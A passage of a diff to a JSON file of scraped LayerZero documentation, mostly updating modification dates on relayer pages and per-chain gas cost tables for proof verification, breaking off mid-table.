0x3aCAAf60502791D199a5a5F0B173D78229eBFe32 Aptos: 0x47a30bcdb5b5bdbf6af883c7325827f3e40b3f52c3538e9e677e68cf0c0db060 Meritcircle: 0x3aCAAf60502791D199a5a5F0B173D78229eBFe32 Mantle: 0x45841dd1ca50265Da7614fC43A361e526c0e6160 Zora: 0x6C7Ab2202C98C4227C5c46f1417D81144DA716Ff Loot: 0x6C7Ab2202C98C4227C5c46f1417D81144DA716Ff Telos: 0x6C7Ab2202C98C4227C5c46f1417D81144DA716Ff Tomo: 0x6C7Ab2202C98C4227C5c46f1417D81144DA716Ff opBNB: 0x6C7Ab2202C98C4227C5c46f1417D81144DA716Ff Shimmer: 0x6C7Ab2202C98C4227C5c46f1417D81144DA716Ff Aurora: 0x6C7Ab2202C98C4227C5c46f1417D81144DA716Ff Lif3: 0x45841dd1ca50265Da7614fC43A361e526c0e6160 Previous Google Cloud Oracle Next Chainlink Oracle Last modified 1mo ago", "labels": [ "Documentation" ] @@ -1450,7 +1450,7 @@ { "title": "Develop a Relayer", "html_url": "https://layerzero.gitbook.io/docs/ecosystem/relayer/develop-a-relayer", - "body": "Develop a Relayer To run your own Relayer, follow these high level requirements for each chain: Deploy and maintain a contract that implements ILayerZeroRelayerV2 interface. A reference Relayer implementation can be found here . Make sure your Relayer contract has access to up-to-date gas price information for all destination chains in order to accurately estimate transaction delivery fees. Configure your application to use your custom Relayer contract by calling setConfig in Endpoint contract. More information about setting a custom configuration can be found here . Have access to your own nodes RPC + WS (or rely on one or more providers). Maintain and balance wallets used for delivering messages/payloads. Create an off-chain service that listens to Packet event emitted by UltraLightNodeV2 on the source chain, waits for the configured number of confirmations and calls validateTransactionProof in UltraLightNodeV2 on the destination providing data from the event and the transaction proof. A reference implementation of transaction proof generation can be found here Off-chain Relayer is implementation agnostic. As long as it performs the core function of delivering the message, the implementation is open to interpretation and can be modified. Previous Overview Next LayerZero Relayer Last modified 16d ago", + "body": "Develop a Relayer To run your own Relayer, follow these high level requirements for each chain: Deploy and maintain a contract that implements ILayerZeroRelayerV2 interface. A reference Relayer implementation can be found here . Make sure your Relayer contract has access to up-to-date gas price information for all destination chains in order to accurately estimate transaction delivery fees. Configure your application to use your custom Relayer contract by calling setConfig in Endpoint contract. More information about setting a custom configuration can be found here . Have access to your own nodes RPC + WS (or rely on one or more providers). Maintain and balance wallets used for delivering messages/payloads. Create an off-chain service that listens to Packet event emitted by UltraLightNodeV2 on the source chain, waits for the configured number of confirmations and calls validateTransactionProof in UltraLightNodeV2 on the destination providing data from the event and the transaction proof. A reference implementation of transaction proof generation can be found here Off-chain Relayer is implementation agnostic. As long as it performs the core function of delivering the message, the implementation is open to interpretation and can be modified. Previous Overview Next LayerZero Relayer Last modified 1mo ago", "labels": [ "Documentation" ] @@ -1458,7 +1458,7 @@ { "title": "LayerZero Relayer", "html_url": "https://layerzero.gitbook.io/docs/ecosystem/relayer/layerzero-relayer", - "body": "LayerZero Relayer The Relayer run by LayerZero Labs and reference implementation. User Applications that opt in to the default configuration will use the LayerZero Labs Relayer. LayerZero Labs runs and maintains a Relayer as a production asset for the ecosystem. Gas Convention The LayerZero Relayer assumes only a base gas for destination contract call, e.g. 200k gas for a call on Ethereum. It will only be enough for very simple applications. If your app requires more gas, please use the adapter parameters specified here. Previous Develop a Relayer Next Max Proof Cost Estimate Last modified 4mo ago", + "body": "LayerZero Relayer The Relayer run by LayerZero Labs and reference implementation. User Applications that opt in to the default configuration will use the LayerZero Labs Relayer. LayerZero Labs runs and maintains a Relayer as a production asset for the ecosystem. Gas Convention The LayerZero Relayer assumes only a base gas for destination contract call, e.g. 200k gas for a call on Ethereum. It will only be enough for very simple applications. If your app requires more gas, please use the adapter parameters specified here. Previous Develop a Relayer Next Max Proof Cost Estimate Last modified 1mo ago", "labels": [ "Documentation" ] @@ -1466,7 +1466,7 @@ { "title": "Max Proof Cost Estimate", "html_url": "https://layerzero.gitbook.io/docs/ecosystem/relayer/max-proof-cost-estimate", - "body": "Max Proof Cost Estimate Ethereum Block hash: 0x26aa36d95218cabf8a7fa99ab30a3036176f35770135c9247beaf95df7a3bd1e Transactions: 24 -------------------------------- | --------------------------- | ------------- | ----------------------------- | Solc version: 0.7 .6 Optimizer enabled: true Runs: 200 Block limit: 10000000 gas | | | | Methods | | | | | | | Contract Method Min Max Avg # calls usd (avg) | | | | | | | ProverMock verifyReceipt 61174 99524 84373 24 - | | | | | | | Deployments % of limit | | | | | | ProverMock - - 1052934 10.5 % - -------------------------------- | ------------- | ------------- | ------------- | --------------- | ------------- Block hash: 0x0752d5256a7d45734130b4ec6beb94a0c602fe687788dc513270c64c918e2aad Transactions: 5 -------------------------------- | --------------------------- | ------------- | ----------------------------- | Solc version: 0.7 .6 Optimizer enabled: true Runs: 200 Block limit: 10000000 gas | | | | Methods | | | | | | | Contract Method Min Max Avg # calls usd (avg) | | | | | | | ProverMock verifyReceipt 68313 90113 82194 5 - | | | | | | | Deployments % of limit | | | | | | ProverMock - - 1052934 10.5 % - -------------------------------- | ------------- | ------------- | ------------- | --------------- | ------------- Block hash: 0x00bd18eff5cf2aa23f5625a65776e57bdb8d570849f822be20011b03eff7f515 Transactions: 77 -------------------------------- | --------------------------- | ------------- | ----------------------------- | Solc version: 0.7 .6 Optimizer enabled: true Runs: 200 Block limit: 10000000 gas | | | | Methods | | | | | | | Contract Method Min Max Avg # calls usd (avg) | | | | | | | ProverMock verifyReceipt 62892 182571 93588 77 - | | | | | | | Deployments % of limit | | | | | | ProverMock - - 1052934 10.5 % - -------------------------------- | ------------- | ------------- | ------------- | --------------- | ------------- Block hash: 0xb0857894026c1b5c9e93d632b2ddb574723ba1be37f7f5341c4152a4669acc2e Transactions: 146 -------------------------------- | --------------------------- | ------------- | ----------------------------- | Solc version: 0.7 .6 Optimizer enabled: true Runs: 200 Block limit: 10000000 gas | | | | Methods | | | | | | | Contract Method Min Max Avg # calls usd (avg) | | | | | | | ProverMock verifyReceipt 87385 156948 101622 146 - \u0000 | | | | | | | Deployments % of limit | | | | | | ProverMock - - 1052934 10.5 % - -------------------------------- | ------------- | ------------- | ------------- | --------------- | ------------- Block hash: 0xad903a6a1ae4a8c4e504d2441ff5f41247276d5db627e06dd9d0abb10bc1a608 Transactions: 231 -------------------------------- | --------------------------- | ------------- | ----------------------------- | Solc version: 0.7 .6 Optimizer enabled: true Runs: 200 Block limit: 10000000 gas | | | | Methods | | | | | | | Contract Method Min Max Avg # calls usd (avg) | | | | | | | ProverMock verifyReceipt 80559 240303 114792 231 - | | | | | | | Deployments % of limit | | | | | | ProverMock - - 1052934 10.5 % - -------------------------------- | ------------- | ------------- | ------------- | --------------- | ------------- Avalanche Block hash: 0x4a2fa85017155bc19f133a1039a1316f5a7bd28544c5e24b702907a9a403fb20 Transactions: 15 arbiscan link: https://snowtrace.io/block/11010359 -------------------------------- | --------------------------- | ------------- | ----------------------------- | Solc version: 0.7 .6 Optimizer enabled: true Runs: 200 Block limit: 10000000 gas | | | | Methods \u0000 | | | | | | | Contract Method Min Max Avg # calls usd (avg) | | | | | | | ProverMock verifyReceipt 56104 126950 94761 15 - | | | | | | | Deployments % of limit | | | | | | ProverMock - - 1052934 10.5 % - -------------------------------- | ------------- | ------------- | ------------- | --------------- | ------------- Block hash: 0x40d05100055202d5ec8a2347703ae231a76070c93e65084642d25939955a8186 Transactions: 7 arbiscan link: https://snowtrace.io/block/11010351 -------------------------------- | --------------------------- | ------------- | ----------------------------- | Solc version: 0.7 .6 Optimizer enabled: true Runs: 200 Block limit: 10000000 gas | | | \u0000 | Methods | | | | | | | Contract Method Min Max Avg # calls usd (avg) | | | | | | | ProverMock verifyReceipt 56080 104739 89506 7 - | | | | | | | Deployments % of limit | | | | | | ProverMock - - 1052934 10.5 % - -------------------------------- | ------------- | ------------- | ------------- | --------------- | ------------- Block hash: 0xbbaab14f777b123a214be3c7706bc9cd587ce41908245a256ec309f6c42c72dc Transactions: 54 arbiscan link: https://snowtrace.io/block/11010459 -------------------------------- | --------------------------- | ------------- | ----------------------------- | Solc version: 0.7 .6 Optimizer enabled: true Runs: 200 Block limit: 10000000 gas | | | | Methods | | | | | | | Contract Method Min Max Avg # calls usd (avg) | | | | | | | ProverMock verifyReceipt 57678 125721 93626 54 - | | | | | | | Deployments % of limit | | | | | | ProverMock - - 1052934 10.5 % - -------------------------------- | ------------- | ------------- | ------------- | --------------- | ------------- Block hash: 0xdf0759292a69988b88e04b65352c447488522bd0a795988cbfb1a37354f70a87 Transactions: 62 arbiscan link: https://snowtrace.io/block/11008999 -------------------------------- | --------------------------- | ------------- | ----------------------------- | Solc version: 0.7 .6 Optimizer enabled: true Runs: 200 Block limit: 10000000 gas | | | | Methods | | | | | | | Contract Method Min Max Avg # calls usd (avg) | | | | | | | ProverMock verifyReceipt 84712 265574 91252 62 - | | | | | | | Deployments % of limit | | | | | | ProverMock - - 1052934 10.5 % - -------------------------------- | ------------- | ------------- | ------------- | --------------- | ------------- Block hash: 0x8457411b586c7844172b9aecd66be5e81ad7386cac48ee37a90d5c6a554dc724 Transactions: 36 arbiscan link: https://snowtrace.io/block/11007767 -------------------------------- | --------------------------- | ------------- | ----------------------------- | Solc version: 0.7 .6 Optimizer enabled: true Runs: 200 Block limit: 10000000 gas | | | | Methods | | | | | | | Contract Method Min Max Avg # calls usd (avg) | | | | | | | ProverMock verifyReceipt 57130 162222 100705 36 - | | | | | | | Deployments % of limit | | | | | | ProverMock - - 1052934 10.5 % - -------------------------------- | ------------- | ------------- | ------------- | --------------- | ------------- Binance Smart Chain Block hash: 0x0eab559e2907f57c799a7d0c7f8c19566061b64b0f770ee26e343abe60918714 Transactions: 108 arbiscan link: https://bscscan.com/block/15315394 -------------------------------- | --------------------------- | ------------- | ----------------------------- | Solc version: 0.7 .6 Optimizer enabled: true Runs: 200 Block limit: 10000000 gas | | | | Methods | | | | | | | Contract Method Min Max Avg # calls usd (avg) | | | | | | | ProverMock verifyReceipt 59252 220283 104817 108 - | | | | | | | Deployments % of limit | | | | | | ProverMock - - 1052934 10.5 % - -------------------------------- | ------------- | ------------- | ------------- | --------------- | ------------- Block hash: 0x3e40e118a9d2b04582847b02d245375aaf0c047a2257a1242dff741d1045e5f7 Transactions: 90 arbiscan link: https://bscscan.com/block/15315375 -------------------------------- | --------------------------- | ------------- | ----------------------------- | Solc version: 0.7 .6 Optimizer enabled: true Runs: 200 Block limit: 10000000 gas | | | | Methods | | | \u0000 | | | | Contract Method Min Max Avg # calls usd (avg) | | | | | | | ProverMock verifyReceipt 63501 175032 102260 90 - | \u0000 | | | | | | Deployments % of limit | | | | | | ProverMock - - 1052934 10.5 % - -------------------------------- | ------------- | ------------- | ------------- | --------------- | ------------- Block hash: 0xea2560a73df07d39c2f16bf8f2a167d61f88ab9897a0d96483471e1252114a05 Transactions: 99 arbiscan link: https://bscscan.com/block/15316129 -------------------------------- | --------------------------- | ------------- | ----------------------------- | Solc version: 0.7 .6 Optimizer enabled: true Runs: 200 Block limit: 10000000 gas | | | | Methods | | | | | | | Contract Method Min Max Avg # calls usd (avg) | | | | | | | ProverMock verifyReceipt 64086 175450 107524 99 - | \u0000 | | | | | | Deployments % of limit | | | | | | ProverMock - - 1052934 10.5 % - -------------------------------- | ------------- | ------------- | ------------- | --------------- | ------------- Block hash: 0x72656b7c47227f87bdfd67d3a96de84aba761fbfc884ece6f7c90b49cadaf5ec Transactions: 216 arbiscan link: https://bscscan.com/block/15315774 -------------------------------- | --------------------------- | ------------- | ----------------------------- | Solc version: 0.7 .6 Optimizer enabled: true Runs: 200 Block limit: 10000000 gas | | | | Methods | | | | | | | Contract Method Min Max Avg # calls usd (avg) | | | | | | | ProverMock verifyReceipt 86135 283471 122172 216 - | | | | | | | Deployments % of limit | | | | | | ProverMock - - 1052946 10.5 % - -------------------------------- | ------------- | ------------- | ------------- | --------------- | ------------- Block hash: 0xd083d890b4aeff1888236572c8a7c45f01c88dfbeb36dd119a32cbe754b6f942 Transactions: 143 arbiscan link: https://bscscan.com/block/15315757 -------------------------------- | --------------------------- | ------------- | ----------------------------- | Solc version: 0.7 .6 Optimizer enabled: true Runs: 200 Block limit: 10000000 gas | | | | Methods | | | | | | | Contract Method Min Max Avg # calls usd (avg) | | | | | | | ProverMock verifyReceipt 87361 216799 107376 143 - | | | | | | | Deployments % of limit | | | | | | ProverMock - - 1052946 10.5 % - -------------------------------- | ------------- | ------------- | ------------- | --------------- | ------------- Polygon Block hash: 0x9b5778164dc8ae2724350a7614d619e886777a9d438b0157a25702541aab20cb Transactions: 38 polygonscan link: https://polygonscan.com/block/25018717 -------------------------------- | --------------------------- | ------------- | ----------------------------- | Solc version: 0.7 .6 Optimizer enabled: true Runs: 200 Block limit: 10000000 gas | | | | Methods | | | | | | | Contract Method Min Max Avg # calls usd (avg) | | | | | | | ProverMock verifyReceipt 64540 189234 113970 38 - | | | | | | | Deployments % of limit | | | | | | ProverMock - - 1052934 10.5 % - -------------------------------- | ------------- | ------------- | ------------- | --------------- | ------------- Block hash: 0x226a10daf095bcc36fb59c7629128f95370a15f512cb4613e6253bc3bc0d4b37 Transactions: 78 polygonscan link: https://polygonscan.com/block/25019837 -------------------------------- | --------------------------- | ------------- | ----------------------------- | Solc version: 0.7 .6 Optimizer enabled: true Runs: 200 Block limit: 10000000 gas | | | | Methods | | | | | | | Contract Method Min Max Avg # calls usd (avg) | | | | | | | ProverMock verifyReceipt 65542 341630 114085 78 - | | | | | | | Deployments % of limit | | | | | | ProverMock - - 1052934 10.5 % - -------------------------------- | ------------- | ------------- | ------------- | --------------- | ------------- Block hash: 0xf15823bce9f3f660fc14c82e3538bc92a9c76091e7c080efc5d0c73a77a07d5b Transactions: 28 polygonscan link: https://polygonscan.com/block/25020548 -------------------------------- | --------------------------- | ------------- | ----------------------------- | Solc version: 0.7 .6 Optimizer enabled: true Runs: 200 Block limit: 10000000 gas | | | | Methods | | | | | | | Contract Method Min Max Avg # calls usd (avg) | | | | | | | ProverMock verifyReceipt 68238 166723 102890 28 - | | | | | | | Deployments % of limit | | | | | | ProverMock - - 1052934 10.5 % - -------------------------------- | ------------- | ------------- | ------------- | --------------- | ------------- Block hash: 0x3ede1d93dd20267922ec7a008d651768bb20f5b2ee572c8efc30e152715df942 Transactions: 110 polygonscan link: https://polygonscan.com/block/25020699 -------------------------------- | --------------------------- | ------------- | ----------------------------- | Solc version: 0.7 .6 Optimizer enabled: true Runs: 200 Block limit: 10000000 gas | | | | Methods | | | | | | | Contract Method Min Max Avg # calls usd (avg) | | | | | | | ProverMock verifyReceipt 76092 301332 111493 110 - | | | | | | | Deployments % of limit | | | | | | ProverMock - - 1052934 10.5 % - -------------------------------- | ------------- | ------------- | ------------- | --------------- | ------------- Arbitrum Block hash: 0x1e8b8bbfbe043c6514ca0d059a488edbdd5af94f18976ac9f3960b9a818ab623 Transactions: 1 arbiscan link: https://arbiscan.io/block/6197283 -------------------------------- | --------------------------- | ------------- | ----------------------------- | Solc version: 0.7 .6 Optimizer enabled: true Runs: 200 Block limit: 10000000 gas | | | | Methods | | | | | | | Contract Method Min Max Avg # calls usd (avg) | | | | | | | ProverMock verifyReceipt - - 52340 1 - | | | | | | | Deployments % of limit | | | | | | ProverMock - - 1052934 10.5 % - -------------------------------- | ------------- | ------------- | ------------- | --------------- | ------------- Block hash: 0x439d1377c0bfba294a07f720be1b0958c64d33f1d9c471f0ef6d17fcb813e7b2 Transactions: 2 arbiscan link: https://arbiscan.io/block/6197266 -------------------------------- | --------------------------- | ------------- | ----------------------------- | Solc version: 0.7 .6 Optimizer enabled: true Runs: 200 Block limit: 10000000 gas | | | | Methods | | | | | | | Contract Method Min Max Avg # calls usd (avg) | | | | | | | ProverMock verifyReceipt 60769 73201 66985 2 - | | | | | | | Deployments % of limit | | | | | | ProverMock - - 1052934 10.5 % - -------------------------------- | ------------- | ------------- | ------------- | --------------- | ------------- Block hash: 0xa31ad5e12ac1715b23f353012c1511cbf4c6be57bedf1d3d5e6e9faafee71494 Transactions: 3 arbiscan link: https://arbiscan.io/block/6196951 -------------------------------- | --------------------------- | ------------- | ----------------------------- | Solc version: 0.7 .6 Optimizer enabled: true Runs: 200 Block limit: 10000000 gas | | | | Methods | | | | | | | Contract Method Min Max Avg # calls usd (avg) | | | | | | | ProverMock verifyReceipt 59129 79875 72960 3 - | | | | | | | Deployments % of limit | | | | | | ProverMock - - 1052934 10.5 % - -------------------------------- | ------------- | ------------- | ------------- | --------------- | ------------- Block hash: 0x0def97133f0006e041209c721e998ad499121f9e8bd455533cdda69b5965b8fe Transactions: 11 arbiscan link: https://arbiscan.io/block/6196815 -------------------------------- | --------------------------- | ------------- | ----------------------------- | Solc version: 0.7 .6 Optimizer enabled: true Runs: 200 Block limit: 10000000 gas | | | | Methods | | | | | | | Contract Method Min Max Avg # calls usd (avg) | | | | | | | ProverMock verifyReceipt 81024 171918 99101 11 - | | | | | | | Deployments % of limit | | | | | | ProverMock - - 1052934 10.5 % - -------------------------------- | ------------- | ------------- | ------------- | --------------- | ------------- Block hash: 0xf119aefaccea7323a8faafd76706b22fd612b23a68a56a2a6ecc2fe5df27c9dc Transactions: 5 arbiscan link: https://arbiscan.io/block/6196814 -------------------------------- | --------------------------- | ------------- | ----------------------------- | Solc version: 0.7 .6 Optimizer enabled: true Runs: 200 Block limit: 10000000 gas | | | | Methods | | | | | | | Contract Method Min Max Avg # calls usd (avg) | | | | | | | ProverMock verifyReceipt 125488 173074 152762 5 - | | | | | | | Deployments % of limit | | | | | | ProverMock - - 1052934 10.5 % - -------------------------------- | ------------- | ------------- | ------------- | --------------- | ------------- Optimism N/A Fantom N/A Previous LayerZero Relayer Next - Ecosystem Oracle Last modified 3mo ago", + "body": "Max Proof Cost Estimate Ethereum Block hash: 0x26aa36d95218cabf8a7fa99ab30a3036176f35770135c9247beaf95df7a3bd1e Transactions: 24 -------------------------------- | --------------------------- | ------------- | ----------------------------- | Solc version: 0.7 .6 Optimizer enabled: true Runs: 200 Block limit: 10000000 gas | | | | Methods | | | | | | | Contract Method Min Max Avg # calls usd (avg) | | | | | | | ProverMock verifyReceipt 61174 99524 84373 24 - | | | | | | | Deployments % of limit | | | | | | ProverMock - - 1052934 10.5 % - -------------------------------- | ------------- | ------------- | ------------- | --------------- | ------------- Block hash: 0x0752d5256a7d45734130b4ec6beb94a0c602fe687788dc513270c64c918e2aad Transactions: 5 -------------------------------- | --------------------------- | ------------- | ----------------------------- | Solc version: 0.7 .6 Optimizer enabled: true Runs: 200 Block limit: 10000000 gas | | | | Methods | | | | | | | Contract Method Min Max Avg # calls usd (avg) | | | | | | | ProverMock verifyReceipt 68313 90113 82194 5 - | | | | | | | Deployments % of limit | | | | | | ProverMock - - 1052934 10.5 % - -------------------------------- | ------------- | ------------- | ------------- | --------------- | ------------- Block hash: 0x00bd18eff5cf2aa23f5625a65776e57bdb8d570849f822be20011b03eff7f515 Transactions: 77 -------------------------------- | --------------------------- | ------------- | ----------------------------- | Solc version: 0.7 .6 Optimizer enabled: true Runs: 200 Block limit: 10000000 gas | | | | Methods | | | | | | | Contract Method Min Max Avg # calls usd (avg) | | | | | | | ProverMock verifyReceipt 62892 182571 93588 77 - | | | | | | | Deployments % of limit | | | | | | ProverMock - - 1052934 10.5 % - -------------------------------- | ------------- | ------------- | ------------- | --------------- | ------------- Block hash: 0xb0857894026c1b5c9e93d632b2ddb574723ba1be37f7f5341c4152a4669acc2e Transactions: 146 -------------------------------- | --------------------------- | ------------- | ----------------------------- | Solc version: 0.7 .6 Optimizer enabled: true Runs: 200 Block limit: 10000000 gas | | | | Methods | | | | | | | Contract Method Min Max Avg # calls usd (avg) | | | | | | | ProverMock verifyReceipt 87385 156948 101622 146 - \u0000 | | | | | | | Deployments % of limit | | | | | | ProverMock - - 1052934 10.5 % - -------------------------------- | ------------- | ------------- | ------------- | --------------- | ------------- Block hash: 0xad903a6a1ae4a8c4e504d2441ff5f41247276d5db627e06dd9d0abb10bc1a608 Transactions: 231 -------------------------------- | --------------------------- | ------------- | ----------------------------- | Solc version: 0.7 .6 Optimizer enabled: true Runs: 200 Block limit: 10000000 gas | | | | Methods | | | | | | | Contract Method Min Max Avg # calls usd (avg) | | | | | | | ProverMock verifyReceipt 80559 240303 114792 231 - | | | | | | | Deployments % of limit | | | | | | ProverMock - - 1052934 10.5 % - -------------------------------- | ------------- | ------------- | ------------- | --------------- | ------------- Avalanche Block hash: 0x4a2fa85017155bc19f133a1039a1316f5a7bd28544c5e24b702907a9a403fb20 Transactions: 15 arbiscan link: https://snowtrace.io/block/11010359 -------------------------------- | --------------------------- | ------------- | ----------------------------- | Solc version: 0.7 .6 Optimizer enabled: true Runs: 200 Block limit: 10000000 gas | | | | Methods \u0000 | | | | | | | Contract Method Min Max Avg # calls usd (avg) | | | | | | | ProverMock verifyReceipt 56104 126950 94761 15 - | | | | | | | Deployments % of limit | | | | | | ProverMock - - 1052934 10.5 % - -------------------------------- | ------------- | ------------- | ------------- | --------------- | ------------- Block hash: 0x40d05100055202d5ec8a2347703ae231a76070c93e65084642d25939955a8186 Transactions: 7 arbiscan link: https://snowtrace.io/block/11010351 -------------------------------- | --------------------------- | ------------- | ----------------------------- | Solc version: 0.7 .6 Optimizer enabled: true Runs: 200 Block limit: 10000000 gas | | | \u0000 | Methods | | | | | | | Contract Method Min Max Avg # calls usd (avg) | | | | | | | ProverMock verifyReceipt 56080 104739 89506 7 - | | | | | | | Deployments % of limit | | | | | | ProverMock - - 1052934 10.5 % - -------------------------------- | ------------- | ------------- | ------------- | --------------- | ------------- Block hash: 0xbbaab14f777b123a214be3c7706bc9cd587ce41908245a256ec309f6c42c72dc Transactions: 54 arbiscan link: https://snowtrace.io/block/11010459 -------------------------------- | --------------------------- | ------------- | ----------------------------- | Solc version: 0.7 .6 Optimizer enabled: true Runs: 200 Block limit: 10000000 gas | | | | Methods | | | | | | | Contract Method Min Max Avg # calls usd (avg) | | | | | | | ProverMock verifyReceipt 57678 125721 93626 54 - | | | | | | | Deployments % of limit | | | | | | ProverMock - - 1052934 10.5 % - -------------------------------- | ------------- | ------------- | ------------- | --------------- | ------------- Block hash: 0xdf0759292a69988b88e04b65352c447488522bd0a795988cbfb1a37354f70a87 Transactions: 62 arbiscan link: https://snowtrace.io/block/11008999 -------------------------------- | --------------------------- | ------------- | ----------------------------- | Solc version: 0.7 .6 Optimizer enabled: true Runs: 200 Block limit: 10000000 gas | | | | Methods | | | | | | | Contract Method Min Max Avg # calls usd (avg) | | | | | | | ProverMock verifyReceipt 84712 265574 91252 62 - | | | | | | | Deployments % of limit | | | | | | ProverMock - - 1052934 10.5 % - -------------------------------- | ------------- | ------------- | ------------- | --------------- | ------------- Block hash: 0x8457411b586c7844172b9aecd66be5e81ad7386cac48ee37a90d5c6a554dc724 Transactions: 36 arbiscan link: https://snowtrace.io/block/11007767 -------------------------------- | --------------------------- | ------------- | ----------------------------- | Solc version: 0.7 .6 Optimizer enabled: true Runs: 200 Block limit: 10000000 gas | | | | Methods | | | | | | | Contract Method Min Max Avg # calls usd (avg) | | | | | | | ProverMock verifyReceipt 57130 162222 100705 36 - | | | | | | | Deployments % of limit | | | | | | ProverMock - - 1052934 10.5 % - -------------------------------- | ------------- | ------------- | ------------- | --------------- | ------------- Binance Smart Chain Block hash: 0x0eab559e2907f57c799a7d0c7f8c19566061b64b0f770ee26e343abe60918714 Transactions: 108 arbiscan link: https://bscscan.com/block/15315394 -------------------------------- | --------------------------- | ------------- | ----------------------------- | Solc version: 0.7 .6 Optimizer enabled: true Runs: 200 Block limit: 10000000 gas | | | | Methods | | | | | | | Contract Method Min Max Avg # calls usd (avg) | | | | | | | ProverMock verifyReceipt 59252 220283 104817 108 - | | | | | | | Deployments % of limit | | | | | | ProverMock - - 1052934 10.5 % - -------------------------------- | ------------- | ------------- | ------------- | --------------- | ------------- Block hash: 0x3e40e118a9d2b04582847b02d245375aaf0c047a2257a1242dff741d1045e5f7 Transactions: 90 arbiscan link: https://bscscan.com/block/15315375 -------------------------------- | --------------------------- | ------------- | ----------------------------- | Solc version: 0.7 .6 Optimizer enabled: true Runs: 200 Block limit: 10000000 gas | | | | Methods | | | \u0000 | | | | Contract Method Min Max Avg # calls usd (avg) | | | | | | | ProverMock verifyReceipt 63501 175032 102260 90 - | \u0000 | | | | | | Deployments % of limit | | | | | | ProverMock - - 1052934 10.5 % - -------------------------------- | ------------- | ------------- | ------------- | --------------- | ------------- Block hash: 0xea2560a73df07d39c2f16bf8f2a167d61f88ab9897a0d96483471e1252114a05 Transactions: 99 arbiscan link: https://bscscan.com/block/15316129 -------------------------------- | --------------------------- | ------------- | ----------------------------- | Solc version: 0.7 .6 Optimizer enabled: true Runs: 200 Block limit: 10000000 gas | | | | Methods | | | | | | | Contract Method Min Max Avg # calls usd (avg) | | | | | | | ProverMock verifyReceipt 64086 175450 107524 99 - | \u0000 | | | | | | Deployments % of limit | | | | | | ProverMock - - 1052934 10.5 % - -------------------------------- | ------------- | ------------- | ------------- | --------------- | ------------- Block hash: 0x72656b7c47227f87bdfd67d3a96de84aba761fbfc884ece6f7c90b49cadaf5ec Transactions: 216 arbiscan link: https://bscscan.com/block/15315774 -------------------------------- | --------------------------- | ------------- | ----------------------------- | Solc version: 0.7 .6 Optimizer enabled: true Runs: 200 Block limit: 10000000 gas | | | | Methods | | | | | | | Contract Method Min Max Avg # calls usd (avg) | | | | | | | ProverMock verifyReceipt 86135 283471 122172 216 - | | | | | | | Deployments % of limit | | | | | | ProverMock - - 1052946 10.5 % - -------------------------------- | ------------- | ------------- | ------------- | --------------- | ------------- Block hash: 0xd083d890b4aeff1888236572c8a7c45f01c88dfbeb36dd119a32cbe754b6f942 Transactions: 143 arbiscan link: https://bscscan.com/block/15315757 -------------------------------- | --------------------------- | ------------- | ----------------------------- | Solc version: 0.7 .6 Optimizer enabled: true Runs: 200 Block limit: 10000000 gas | | | | Methods | | | | | | | Contract Method Min Max Avg # calls usd (avg) | | | | | | | ProverMock verifyReceipt 87361 216799 107376 143 - | | | | | | | Deployments % of limit | | | | | | ProverMock - - 1052946 10.5 % - -------------------------------- | ------------- | ------------- | ------------- | --------------- | ------------- Polygon Block hash: 0x9b5778164dc8ae2724350a7614d619e886777a9d438b0157a25702541aab20cb Transactions: 38 polygonscan link: https://polygonscan.com/block/25018717 -------------------------------- | --------------------------- | ------------- | ----------------------------- | Solc version: 0.7 .6 Optimizer enabled: true Runs: 200 Block limit: 10000000 gas | | | | Methods | | | | | | | Contract Method Min Max Avg # calls usd (avg) | | | | | | | ProverMock verifyReceipt 64540 189234 113970 38 - | | | | | | | Deployments % of limit | | | | | | ProverMock - - 1052934 10.5 % - -------------------------------- | ------------- | ------------- | ------------- | --------------- | ------------- Block hash: 0x226a10daf095bcc36fb59c7629128f95370a15f512cb4613e6253bc3bc0d4b37 Transactions: 78 polygonscan link: https://polygonscan.com/block/25019837 -------------------------------- | --------------------------- | ------------- | ----------------------------- | Solc version: 0.7 .6 Optimizer enabled: true Runs: 200 Block limit: 10000000 gas | | | | Methods | | | | | | | Contract Method Min Max Avg # calls usd (avg) | | | | | | | ProverMock verifyReceipt 65542 341630 114085 78 - | | | | | | | Deployments % of limit | | | | | | ProverMock - - 1052934 10.5 % - -------------------------------- | ------------- | ------------- | ------------- | --------------- | ------------- Block hash: 0xf15823bce9f3f660fc14c82e3538bc92a9c76091e7c080efc5d0c73a77a07d5b Transactions: 28 polygonscan link: https://polygonscan.com/block/25020548 -------------------------------- | --------------------------- | ------------- | ----------------------------- | Solc version: 0.7 .6 Optimizer enabled: true Runs: 200 Block limit: 10000000 gas | | | | Methods | | | | | | | Contract Method Min Max Avg # calls usd (avg) | | | | | | | ProverMock verifyReceipt 68238 166723 102890 28 - | | | | | | | Deployments % of limit | | | | | | ProverMock - - 1052934 10.5 % - -------------------------------- | ------------- | ------------- | ------------- | --------------- | ------------- Block hash: 0x3ede1d93dd20267922ec7a008d651768bb20f5b2ee572c8efc30e152715df942 Transactions: 110 polygonscan link: https://polygonscan.com/block/25020699 -------------------------------- | --------------------------- | ------------- | ----------------------------- | Solc version: 0.7 .6 Optimizer enabled: true Runs: 200 Block limit: 10000000 gas | | | | Methods | | | | | | | Contract Method Min Max Avg # calls usd (avg) | | | | | | | ProverMock verifyReceipt 76092 301332 111493 110 - | | | | | | | Deployments % of limit | | | | | | ProverMock - - 1052934 10.5 % - -------------------------------- | ------------- | ------------- | ------------- | --------------- | ------------- Arbitrum Block hash: 0x1e8b8bbfbe043c6514ca0d059a488edbdd5af94f18976ac9f3960b9a818ab623 Transactions: 1 arbiscan link: https://arbiscan.io/block/6197283 -------------------------------- | --------------------------- | ------------- | ----------------------------- | Solc version: 0.7 .6 Optimizer enabled: true Runs: 200 Block limit: 10000000 gas | | | | Methods | | | | | | | Contract Method Min Max Avg # calls usd (avg) | | | | | | | ProverMock verifyReceipt - - 52340 1 - | | | | | | | Deployments % of limit | | | | | | ProverMock - - 1052934 10.5 % - -------------------------------- | ------------- | ------------- | ------------- | --------------- | ------------- Block hash: 0x439d1377c0bfba294a07f720be1b0958c64d33f1d9c471f0ef6d17fcb813e7b2 Transactions: 2 arbiscan link: https://arbiscan.io/block/6197266 -------------------------------- | --------------------------- | ------------- | ----------------------------- | Solc version: 0.7 .6 Optimizer enabled: true Runs: 200 Block limit: 10000000 gas | | | | Methods | | | | | | | Contract Method Min Max Avg # calls usd (avg) | | | | | | | ProverMock verifyReceipt 60769 73201 66985 2 - | | | | | | | Deployments % of limit | | | | | | ProverMock - - 1052934 10.5 % - -------------------------------- | ------------- | ------------- | ------------- | --------------- | ------------- Block hash: 0xa31ad5e12ac1715b23f353012c1511cbf4c6be57bedf1d3d5e6e9faafee71494 